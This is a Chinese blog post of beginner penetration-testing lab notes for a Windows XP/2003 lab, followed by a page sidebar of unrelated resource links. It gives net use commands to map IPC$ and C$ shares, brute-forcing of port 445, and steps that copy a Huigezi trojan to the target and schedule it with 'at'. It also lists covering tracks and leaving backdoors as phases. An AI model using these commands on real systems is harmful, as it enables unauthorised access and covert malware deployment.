初学渗透测试1

最新推荐文章于 2023-07-05 18:20:36 发布
最新推荐文章于 2023-07-05 18:20:36 发布
阅读量176 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44532761/article/details/106869058
版权

渗透测试

1.授权
2.信息收集
nslookup 查域名whois
3.扫描漏洞
namp-ip范围 端口
高级扫描–
4.漏洞利用
5. 提权(shell环境,桌面环境,最高权限)
6. 擦除痕迹
7. 留后门
8. 渗透测试报告

实验 (xp,2003)

cmd: telnet 10.1.1.2 445 (telnet常被用来探测对方端口)
ScanPort 扫端口

**1.利用445漏洞 IPC$ **

首先利用2003建立一个共享文件价,然后用命令将共享文件映射到本地
在这里插入图片描述
在xp 利用net use 命令 映射默认共享net use z:\iP\c$ “密码” /user:"用户名”(即可将对方的c盘映射为自己的z盘,其他盘类推)
例如: net use f: \10.1.1.2\share 密码 /user:用户

net use \10.1.1.2\ipc$ 密码?/user:用户

==删除net use f: /del net use * /del ==

将c映射到f net use f: \10.1.1.2\c$ 密码 /user:用户

暴力破解密码
NTscan10破 445

建一个批处理
copy con haha.bat
ctrl+z

开机net use --右键我的电脑–映射网络驱动器-开机自连

== u对方所有磁盘net use \10.1.1.2 \ipc$ 密码 /user:用户==
dir \10.1.1.2\c$

灰鸽子使用
将生成的木马文件放在服务器的c盘
copy d:\haha.exe \10.1.1.2\c$\windows\

然后运行,做定时执行任务,前提是建立 ipc$
net time \10.1.1.2 查看对方时间
计划运行
at \10.1.1.2 4:13 “c:\windows\hahahha.exe”
at \10.1.1.2 看正在计划的任务

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nostarch1.zip web漏洞实验app
09-09
漏洞资源 找了挺久 分享给各位 主要在xp机中构建一个有漏洞的网页app
Python Crash Course(NoStarch,2015)
01-03
Python Crash Course is a fast-paced, thorough introduction to programming with Python that will have you writing programs, solving problems, and making things that work in no time. In the first half of the book, you’ll learn about basic programming concepts, such as lists, dictionaries, classes, and loops, and practice writing clean and readable code with exercises for each topic. You’ll also learn how to make your programs interactive and how to test your code safely before adding it to a project. In the second half of the book, you’ll put your new knowledge into practice with three substantial projects: a Space Invaders-inspired arcade game, data visualizations with Python’s super-handy libraries, and a simple web app you can deploy online. As you work through Python Crash Course, you’ll learn how to: Use powerful Python libraries and tools, including matplotlib, NumPy, and Pygal Make 2D games that respond to keypresses and mouse clicks, and that grow more difficult as the game progresses Work with data to generate interactive visualizations Create and customize simple web apps and deploy them safely online Deal with mistakes and errors so you can solve your own programming problems If you’ve been thinking seriously about digging into programming, Python Crash Course will get you up to speed and have you writing real programs fast. Why wait any longer? Start your engines and code!
教孩子编程python 语言 nostarch 下载_教孩子学编程 Python语言版
weixin_39524842的博客
12-08 573
作者简介插图者简介技术评阅者简介内容提要对本书的赞誉前言第1章 Python基础——认识环境1.1 认识Python1.2 用Python编写程序1.3 运行Python程序1.4 本章小结1.5 编程挑战第2章 海龟作图——用Python绘图2.1 第一个海龟程序2.2 旋转的海龟2.3 海龟画圆2.4 添加颜色2.5 一个变量搞定一切2.6 本章小结2.7 编程挑战第3章 数字和变量——用Py...
starch软件下载_认识No Starch Press的创始人Bill Pollock
cumo3681的博客
06-28 2173
starch软件下载 如果您是极客,自己动手,制造商或只是好奇,则需要获得No Starch Press的一些阅读材料, No Starch Press称自己为“极佳的Geek Entertainment”。 在向学生介绍Linux操作系统并帮助他们学习编码时,我将其书用作参考资料。 我最近通过电子邮件与1994年创立的No Starch Press的所有者Bill Pollock聊天。 他...
python儿童入门教程-Python入门基础教程(儿童版) [分享一本入门级教程]
weixin_37988176的博客
10-29 1693
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++1. 推荐书名No Starch--Python for Kids - A Playful Introduction to Programming - J. Briggs-2013.pdf2.下载地址欢迎下载,请访问我的csdn资源本书分享下载页面:(友情提示:...
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
热门推荐
Python_0011的博客
01-07 2万+
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
神仙级渗透测试入门教程(非常详细),从零基础入门到精通,从看这篇开始!
libaiup的博客
06-18 6343
渗透测试:指的是试图利用系统、网络、人力资源或实物资产中的弱点或漏洞,以对安全控制的有效性进行压力测试。
渗透测试入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
xx16755498986的博客
07-05 5680
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。2. 为什么要学渗透测试心理满足感。
如何成为一名合格的初级渗透测试
Galaxy_0的博客
03-08 88
如何成为一名合格的初级渗透测试
nostarch1.zip
08-04
《metasploit渗透测试指南》中的有漏洞的web应用程序文件
nostarch1.rar
06-23
漏洞资源 主要在xp机中构建一个有漏洞的网页app 我是在metasploit渗透测试指南中搭环境用的
渗透测试培训(初级).pdf
01-22
渗透测试培训(初级)
初学渗透指南
04-14
渗透测试实践指南:必知必会的工具与方法,适合初学者学习的书籍
渗透测试初学者资源 DVWA压缩包
12-23
适合win7及以上版本(phpstudy2016及以上)
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
渗透测试实践指南
09-19
本书为渗透测试实践指南 必知必会的工具与方法,适用于初学网络安全的学生,用于了解渗透测试的相关试验工具。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
基于java的-28-“智慧食堂”设计与实现--LW-源码.zip
最新发布
04-25
提供的源码资源涵盖了Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!
推荐个渗透测试的课程
09-21
课程内容涵盖了初学者和中级渗透测试人员所需要的所有知识点。 3. "Metasploit Unleashed" by Offensive Security: 这是一个针对Metasploit框架的教程,Metasploit是一个流行的开源渗透测试框架,用于漏洞利用、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值